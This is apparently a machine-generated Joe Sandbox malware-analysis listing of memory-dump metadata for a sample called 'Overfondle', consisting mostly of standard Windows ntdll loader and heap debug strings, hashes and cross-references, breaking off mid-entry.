                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: cc75e84998e26e42122264e7fab5c6c262ca18a8ff5cb2b73bfae74c138178d4
                                                                        • Instruction ID: 508207d00e635317bca1a55c0559bd72c3a6eab07725a5e8cc096b52f69452cc
                                                                        • Opcode Fuzzy Hash: cc75e84998e26e42122264e7fab5c6c262ca18a8ff5cb2b73bfae74c138178d4
                                                                        • Instruction Fuzzy Hash: 85912371905710AFDB11CFE9CC90F0A7BA5ABA4B19F50C55DFA4C6B6A0C73CAC048792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204CA9A2
                                                                        • TGC , xrefs: 20482462
                                                                        • LdrpDynamicShimModule, xrefs: 204CA998
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 204CA992
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGC $minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-3721819398
                                                                        • Opcode ID: bae866839d8d2e93a20f5bfd863e9eb0a761bd5753af281c187f513e085dfba8
                                                                        • Instruction ID: 4f091a6ce1cd26570b4f1789048c9c9fb07d5bdfe3422abe71a096ec828dad0e
                                                                        • Opcode Fuzzy Hash: bae866839d8d2e93a20f5bfd863e9eb0a761bd5753af281c187f513e085dfba8
                                                                        • Instruction Fuzzy Hash: DC3127B5A00601ABD7119FD98D85F5ABBF4FB94B08F21841AF80067261D77C5D92E790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: f9323da754dcda410a52c0ff8eb06da3454237d5329db8d3029335f72d5d0d2e
                                                                        • Instruction ID: f610078630477824450cadd141428f85657fbe26f4b0ee87746924c86c8baeb1
                                                                        • Opcode Fuzzy Hash: f9323da754dcda410a52c0ff8eb06da3454237d5329db8d3029335f72d5d0d2e
                                                                        • Instruction Fuzzy Hash: DD917472A006999BD718CFD4CDA5B8E3FA0BB90B68F50C16DF9006B391D73C9941DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 204D21BF
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 204D219F
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 204D2160, 204D219A, 204D21BA
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 204D2178
                                                                        • SXS: %s() passed the empty activation context, xrefs: 204D2165
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 204D2180
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 7cf7445cd1e7bb2e8e3b49d5f57069583da25a89d2f2eca1c0bd9d4e8fa9715b
                                                                        • Instruction ID: a20fc754788ed3765bc99f36a67a3c587a8c314102989b5809b968cef55a02df
                                                                        • Opcode Fuzzy Hash: 7cf7445cd1e7bb2e8e3b49d5f57069583da25a89d2f2eca1c0bd9d4e8fa9715b
                                                                        • Instruction Fuzzy Hash: BB310472E0012877F7118AD59D90F5F7B78EBA5A84F01C0A9FF04BB344D2389E02C6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 2049C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 204D81E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 204D8181, 204D81F5
                                                                        • LdrpInitializeProcess, xrefs: 2049C6C4
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 204D8170
                                                                        • LdrpInitializeImportRedirection, xrefs: 204D8177, 204D81EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: ed6b7513fc2fa4275f0c26728ca14fd00f58e254a944f58d03b6bb0e5af9edb7
                                                                        • Instruction ID: 6fad92102c24518bba2f7fc06e829afb28ba762cc0be91c26dc7657628d0c47d
                                                                        • Opcode Fuzzy Hash: ed6b7513fc2fa4275f0c26728ca14fd00f58e254a944f58d03b6bb0e5af9edb7
                                                                        • Instruction Fuzzy Hash: 69310672604705ABC214DFA8DD86F1A7BD5EFD4F58F00896CF8446B391D628DD04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: de171eba1fe5646269d5537b0c3405a8d3886acdcd1ec17377492d7e3ca42110
                                                                        • Instruction ID: f85a95858f70240e774761ec47f6393faf3ddaa35c1e0cca5d6d9d5ddcadc9ea
                                                                        • Opcode Fuzzy Hash: de171eba1fe5646269d5537b0c3405a8d3886acdcd1ec17377492d7e3ca42110
                                                                        • Instruction Fuzzy Hash: D3F17A74A01605DFDB14CFA8C884BAAB7F5FB44704F24C1A8E5059B3A2D738EE81CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204CA121
                                                                        • LdrpCheckModule, xrefs: 204CA117
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 204CA10F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-161242083
                                                                        • Opcode ID: 9ff35f7010efdfd13ace1e13ccc2d98ca61db398b17d6cbdf7da6d58b833339c
                                                                        • Instruction ID: d30dd3b759153ac7735b86a703b3f72ea4e2bd76110917dc6472b86654e0e3e0
                                                                        • Opcode Fuzzy Hash: 9ff35f7010efdfd13ace1e13ccc2d98ca61db398b17d6cbdf7da6d58b833339c
                                                                        • Instruction Fuzzy Hash: D071BE75A006059FCB08DFE8CD81BAEBBF4EB54608F14862DE4019B311E73CAE42DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 204D82DE
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204D82E8
                                                                        • Failed to reallocate the system dirs string !, xrefs: 204D82D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-1783798831
                                                                        • Opcode ID: e0c307f285d555de7e6bfe9d6f64955563bc22efd027e7a56a112a5b42306e2a
                                                                        • Instruction ID: c2a9949d5280c5e03ed0509262dbe492fb589e738b2018bc85bbaddb740d3156
                                                                        • Opcode Fuzzy Hash: e0c307f285d555de7e6bfe9d6f64955563bc22efd027e7a56a112a5b42306e2a
                                                                        • Instruction Fuzzy Hash: 5441B272504705EBC710DBE8CD85B5B7BE8EB68A54F00C96EB94897260E77CE9009B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 204E4888
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 204E4899
                                                                        • LdrpCheckRedirection, xrefs: 204E488F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 3446177414-3154609507
                                                                        • Opcode ID: fd1edee06f0c2530ec6a34880404b49f9040e8c5129a4fcc9fae91e7fb8cf977
                                                                        • Instruction ID: 7e7b6b1915373078cac55ba2c0a9ae9a6bc4d15f16b98297eabb07e039e34f8e
                                                                        • Opcode Fuzzy Hash: fd1edee06f0c2530ec6a34880404b49f9040e8c5129a4fcc9fae91e7fb8cf977
                                                                        • Instruction Fuzzy Hash: 2841CD36A046508BCB21DFAAC840E167BE5FFCDA52F528569ED8C97351D338DC00DB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 204A2DF0: LdrInitializeThunk.NTDLL ref: 204A2DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 13d6b31091cc1c4e10a257b637e0cbb645132b461c861462f3e28a05f9746c5b
                                                                        • Instruction ID: 938bfb96922863259f82ef4064441ae9c5d31cabae7a2dfea747051cafec6fb6
                                                                        • Opcode Fuzzy Hash: 13d6b31091cc1c4e10a257b637e0cbb645132b461c861462f3e28a05f9746c5b
                                                                        • Instruction Fuzzy Hash: 8F428C72900714DFDB20CFA8C891B9AB7F4BF18304F1485A9E989DB345E774AA85CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 6f15e889c9978bdebbe002dfcc72108c29eb15cbed16349157395c415de84914
                                                                        • Instruction ID: 0cdaa70b7df08f8bc324e64e4dfacff839e6b8a23b65990c9861016150fece7d
                                                                        • Opcode Fuzzy Hash: 6f15e889c9978bdebbe002dfcc72108c29eb15cbed16349157395c415de84914
                                                                        • Instruction Fuzzy Hash: 7CF10972E009158BDB08DFA9C99167EFFF6EF98200B19426DD556DB381E634EE01CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2046063D
                                                                        • kLsE, xrefs: 20460540
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 3446177414-2547482624
                                                                        • Opcode ID: ef6ab05c9c10e5671ff82748d780b9ceb8ab1b6c74dfdda7ae71650dd30d749b
                                                                        • Instruction ID: 5b70b12b3baeab8e7768783864e9df6b5112cc7569b8a3d64f4f094501f2c890
                                                                        • Opcode Fuzzy Hash: ef6ab05c9c10e5671ff82748d780b9ceb8ab1b6c74dfdda7ae71650dd30d749b
                                                                        • Instruction Fuzzy Hash: AB517C715047429BC324DFA4C580797B7E5AF84704F10C83EEAAA87241F778EA55CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 1d7deee30538078084d265e019c0ebc1a3ef456e7a4c4b52e5dc96c7225b0f23
                                                                        • Instruction ID: 03283beb351f15bfd5ec716d042c41cd21ef5258a89c65bdd99ff39a317b72f7
                                                                        • Opcode Fuzzy Hash: 1d7deee30538078084d265e019c0ebc1a3ef456e7a4c4b52e5dc96c7225b0f23
                                                                        • Instruction Fuzzy Hash: 83C158741087829FC711CF94C540B5AB7E4BF84B08F10896AF9968B351E7BCDA96CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 20498421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2049855E
                                                                        • @, xrefs: 20498591
                                                                        • LdrpInitializeProcess, xrefs: 20498422
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 547735b056149b1dba9a81e4ef0453fe6546577f6c987f1d57503fc955ac4f57
                                                                        • Instruction ID: db1013cfd979b9d7600060f96d1a655a6353c9dc9910e09e2c59dcee786ae264
                                                                        • Opcode Fuzzy Hash: 547735b056149b1dba9a81e4ef0453fe6546577f6c987f1d57503fc955ac4f57
                                                                        • Instruction Fuzzy Hash: 9F91A171508344AFD311DFA8CC51F9BBBE8BF94798F40892EFA8492551E738DA04DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • SXS: %s() passed the empty activation context, xrefs: 204D21DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 204D22B6
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 204D21D9, 204D22B1
                                                                        • .Local, xrefs: 204928D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: 167c63724b2cb1c974eb1c852d9ade2e46f6bc06593387cb086f92736b840e6d
                                                                        • Instruction ID: 12278e84fe976cd5f834d2df6e10bd882edf5e4de342aebe1a3058ab3abc8b2d
                                                                        • Opcode Fuzzy Hash: 167c63724b2cb1c974eb1c852d9ade2e46f6bc06593387cb086f92736b840e6d
                                                                        • Instruction Fuzzy Hash: F0A18F71A4122D9FDB20CFA4D984B99B7B1BF68314F2181E9ED08A7351D7389E81CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 204D3456
                                                                        • RtlDeactivateActivationContext, xrefs: 204D3425, 204D3432, 204D3451
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 204D3437
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 204D342A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                         • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                         • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
Uniqueness
Uniqueness Score: -1.00%

Strings
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 204C10AE
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 204C0FE5
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 204C106B
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 204C1028
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Uniqueness
Uniqueness Score: -1.00%

Strings
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2047327D
• HEAP[%wZ]: , xrefs: 20473255
• HEAP: , xrefs: 20473264
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: @
• API String ID: 3446177414-2766056989
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
• Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
